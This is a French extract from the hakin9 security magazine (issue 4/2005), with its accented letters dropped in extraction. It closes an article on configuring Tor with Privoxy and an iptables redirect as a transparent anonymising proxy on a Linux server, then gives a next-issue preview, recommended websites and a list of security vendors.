Dmarrage rapide Linux : Admettons que nous
sommes administrateurs d'un petit serveur, et nous vou-
lons que toutes les connexions de nos utilisateurs avec
les sites Web soient anonymes.
Nous dcompactons les sources et les compilons de
faon standard (./configure, make, make install). Nous
crons le rpertoire usr/local/var/lib/tor et l'utilisateur tor
avec ce rpertoire comme rpertoire personnel.
Avant de lancer tor, il faut copier le fichier /usr/local/
etc/tor/torrc.sample vers /usr/local/etc/tor/torrc et ouvrir
le fichier cible pour dition. Pour que tor accepte les con-
nexions partir du rseau local entier (en admettant que
notre rseau local a les adresses 192.168.1.0/24, et le
serveur : 192.168.1.1), nous configurons les options :
SocksPort 9050
SocksBindAddress 192.168.1.1
RunAsDaemon 1
Aprs l'dition du fichier, nous lanons tor : tor --user
tor. Si Tor doit tre dmarr lors du dmarrage du sys-
tme, nous crons les scripts de dmarrage dans /etc/
rc.d ou /etc/init.d (conformment notre distribution).
Comme pour Windows, une fois Tor install
et dmarr, il est ncssaire d'installer Privoxy. Une fois
l'installation termine, il faut diter le fichier de configu-
ration /etc/privoxy/config et ajouter au dbut la ligne
forward-socks4a / 192.168.1.1:9050 .
Il ne faut pas oublier de changer l'option :
listen-address 192.168.1.1:8118
pour que Privoxy coute sur l'adresse dans le rseau
local, et pas seulement localhost. Ensuite, nous lanons
privoxy :
# /usr/sbin/privoxy --user privoxy /etc/privoxy/config
Nous pouvons aussi crer les scripts de dmarrage. la
fin, nous crons le proxy transparent l'aide de l'iptables,
en ajoutant la configuration du pare-feu la ligne :
iptables -t nat -A PREROUTING -p TCP -i eth0 --dport 80 \
-j REDIRECT --to-port 8118
o nous dterminons qu'eth0 est une interface locale.
Toutes les connexions des utilisateurs au port 80 sur
cette interface seront rediriges vers le port 8118 Pri-
voxy, qui, son tour, se connectera Tor.
Autres qualits : Vu que Tor est le proxy SOCKS4, il est
possible d'tablir les connexions anonymes du niveau de
chaque application possdant l'interface SOCKS4 int-
gre (sur le port 9050). Grce cela, nous pouvons nous
connecter anonymement, par exemple, avec l'IRC ou les
groupes de discussion.
Tomasz Nidecki

76 www.hakin9.org hakin9 N o 4/2005

Dans le numro suivant, vous
trouverez, entre autres :
Points faibles des
tlphones GSM
Les tlphones mobiles deviennent
de plus en plus compliqus et ce
qui en rsulte, moins scures.
Lutilisation des erreurs prsentes
dans les systmes dexploitation
grant les portables peut finir par
une attaque russie. Cest larticle
dOlivier Patole qui porte sur ces
problmes.
Tests de pntration
externes
La scurit relle des systmes
rseaux peut tre vrifie unique-
ment laide des tests de pn-
tration. Cependant, les tests de ce
type effectus du ct du LAN
ne donnent pas des informations
entirement fiables. La meilleure
mthode pour vrifier lchelle des
dangers concernant les serveurs
est deffectuer les analyses du ct
dInternet. Comment le faire ? Vous
le saurez aprs la lecture de larticle
de Manuel Geisler.
Scurit de la
machine virtuelle
Java
Le Java populaire et notamment sa
machine virtuelle (Java VM) nest
pas compltement scure con-
trairement aux apparences. Dans
certaines conditions, il est mme
possible daccder directement
la mmoire. Tomasz Rybicki
vous prsente les problmes les
plus importants lis avec Java VM
et il explique comment les viter.
Attaques contre
VoIP
La technologie VoIP (Voice over
Internet Protocol) remporte un
grand succs elle permet de
rduire considrablement les
cots des conversations tlpho-
niques et la qualit des connexions
est parfois meilleure que celle des
connexions traditionnelles. Il existe
pourtant les mthodes dattaque
permettant, entre autres, dinter-
cepter les conversations. Pour en
savoir plus, lisez larticle de Tobias
Glemser.
MacOS X scurit
du kernel
Malgr la participation modeste du
systme dexploitation MacOS X
sur le march, celui-ci est trs
populaire dans certains domaines.
Le systeme est gr par un noyau
moderne bas sur le microkernel
Mach et en partie sur FreeBSD.
Il savre cependant que cette
solution nest pas dpourvue de
dfauts. Ilja van Sprundel vous
dcrit les points faibles du systme
conu par la socit Apple.
Sur le CD
hakin9.live distribution Linux
bootable,
beaucoup doutils indispen-
sables pour chaque hacker,
tutoriaux exercices pratiques
concernant les problmes
dcrits dans les articles,
documentation supplmen-
taire.
Pour trouver les
informations actuelles
sur le prochain numro,
allez la page
http://www.hakin9.org
Le numro sera
disponible en vente au
dbut de septembre
2005.
La rdaction se rserve le droit de
modifier le contenu de la revue.
 m m a n d s > > >
Sites reco

Construit sur des serveurs FreeBSD et Linux

Informations sur UNIX, Linux, Windows, les r-
seaux Hbergement libre sur serveurs libres
www.virtuelnet.net

Du hardware au software, en passant par la

tlphonie mobile, les appareils numriques
et les jeux vidos... db-hardware : le meilleur
de linformatique accessible tous.
http://www.db-hardware.fr

Abc de la scurit informatique : Portail ddi

la protection utilisateurs, la prvention et
lanonymat sur micro et rseaux
http://abcdelasecurite.free.fr

Vulnerabilite.com est le premier portail fran-

cophone ddi la scurit des systmes
dinformation pour les DSI, RSSI et dcideurs
informatiques.
http://www.vulnerabilite.com

Site dinformations et dentraide aux logiciels

libres. Le but du site est de rassembler les
informations et promouvoir le logiciel libre.
http://www.generation-libre.com

Actu-Pc a pour but dinformer et de divertir les

internautes. Retrouvez nos news, nos tests
et dossiers hardware au quotidien.
http://www.actu-pc.net/

Cr par Terence DEWAELE en septembre

2000, Ze-Linux a pour but daider la commu-
naut franaise utiliser GNU/Linux : Forums,
Liste, News
http://www.ze-linux.org/

Ce que nous essayons de faire, cest de

regrouper chaque jour toute linformation
essentielle qui aidera nos visiteurs se tenir
inform des dernires infos essentielles.
http://www.smtechnologie.com

Le Portail Qubcois de la Scurit Des Sys-

tmes. Site de nouvelles, forums, tlcharge-
ments, liens scurit, et conseils.
http://www.cccure.net

ds >>>
Sites recomman
Vous trouverez les informations les plus
rcentes sur le march des logiciels
dans les
Catalogues de hakin9
Sujets des catalogues contenant des articles publicitaires pour le
magazine hakin9 :
N Sujets du catalogue

1. Pare-feux matriels et logiciels

5/2005 2. Systmes VPN matriels et logiciels
3. Services de conception et de contrle des pare-feux

1. Matriel rseau (dispositifs actifs et passifs, lments du

rseau)
6/2005 2. Logiciels de gestion de systme informatique de lentreprise
3. Services de conception et de ralisation des rseaux
informatiques srs

1. Systmes de stockage de donnes srs

2. Logiciels de gestion de stockage et rcupration de donnes
1/2006 3. Rcupration de donnes du matriel abm et suppresion de
donnes sre

1. Cryptage de donnes : logiciels pour les stations client

et serveurs
2/2006 2. Matriel de cryptage
3. Systmes PKI, autorits de certification

Chaque numro prsente des sujets diffrents.

Le catalogue contient les prsentations des entreprises et leurs coordonnes.
Chef du projet : Paulina Nowak tl : +48 22 860 17 68 e-mail : adv@software.com.pl
 Les socits qui offrent
les solutions de scurit
N Nom de la socit ou nom URL N Nom de la socit ou nom URL
du produit du produit
1 AST http://www.ast-global.com 41 Innovative Security Systems http://www.argus-systems.com
2 ClarkConnect http://www.clarkconnect.com 42 Internet Security Alliance http://www.pcinternetpatrol.com
3 European Network Security http://www.ensi.net 43 Internet Security Systems http://www.iss.net
Institute
44 Intrinsec http://www.intrinsec.com
4 Productive http://www.productiveonline.com
45 Intrusion http://www.intrusion.com
5 R. Kinney Williams http://www.yennik.com
& Associates 46 Iopus http://www.iopus.com
6 ScriptLogic Corporation http://www.scriptlogic.com 47 IS Decisions http://www.isdecisions.com
7 Abtrusion Security http://www.abtrusion.com 48 Juniper Networks http://www.juniper.net
8 Actmon http://www.actmon.com 49 k2net http://www.k2net.pl
9 Agnitum http://www.agnitum.com 50 Kerberos http://www.kerberos.pl
10 AirDefense http://www.airdefense.net 51 Lancope http://www.lancope.com
11 Algorithmic Security http://www.algosec.com 52 Magneto Software http://www.magnetosoft.com
12 Aruba Wireless Networks http://www.arubanetworks.com 53 ManTech International http://www.mantech.com
13 Astaro http://www.astaro.com Corporation
14 Atelier Web http://www.atelierweb.com 54 Mcafee http://www.mcafee.com
15 ATM S.A. http://www.atm.com.pl 55 MERINOSOFT http://www.merinosoft.com.pl
16 Axial Systems http://www.axial.co.uk 56 NASK http://www.nask.pl
17 Blue Lance http://www.bluelance.com 57 Nessus http://www.nessus.org
18 Captus Networks Corp. http://www.captusnetworks.com 58 netForensics http://www.netforensics.com
19 Checkpoint http://www.checkpoint.com 59 NetFrameworks http://www.criticalsecurity.com
20 Cisco http://www.cisco.com
60 NetIQ http://www.netiq.com
21 Claranet Limited http://www.clara.net
61 NETSEC - Network Security http://www.specter.com
22 Computer Associates http://www.ca.com Software
23 Computer Network Defence http://www.networkin- 62 NetworkActiv http://www.networkactiv.com
trusion.co.uk
63 Next Generation Security S.L. http://www.ngsec.com
24 Computer Security http://www.cstl.com
Technology 64 NFR Security http://www.nfr.net
25 Core Security Technologies http://www1.corest.com 65 NSECURE Software PVT http://www.nsecure.net
26 Corsaire Limited http://www.corsaire.com Limited
27 DAL http://www.d-a-l.com 66 NwTech http://www.nwtechusa.com
28 Deerfield http://www.deerfield.com 67 Orion Instruments Polska http://www.orion.pl
29 Demarc http://www.demarc.com 68 Positive Technologies http://www.maxpatrol.com
30 Doshelp http://www.doshelp.com 69 Prevx Limited http://www.prevx.com
31 ecom corporation http://www.e-com.ca 70 Privacyware http://www.privacyware.com
32 eEye Digital Security http://www.eeye.com 71 Qbik http://www.wingate.com
33 Enigma Systemy Ochrony http://www.enigma.com.pl 72 Radware http://www.radware.com
Informacji 73 Real Time Enterprises http://www.real-time.com
34 Fortinet http://www.fortinet.com 74 Reflex Security http://www.reflexsecurity.com
35 G-Lock Software http://www.glocksoft.com
75 RiskWatch http://www.riskwatch.com
36 GFI http://www.gfi.com
76 RSA Security http://www.rsasecurity.com
37 GuardedNet http://www.guarded.net
77 Ryan Net Works http://www.cybertrace.com
38 Honeywell http://www.vintec.com
78 Safe Computing http://www.safecomp.com
39 Infiltration Systems http://www.infiltration-
systems.com 79 Safety - Lab http://www.safety-lab.com
40 Infragistics http://www.infragistics.com 80 Seclutions AG http://www.seclutions.com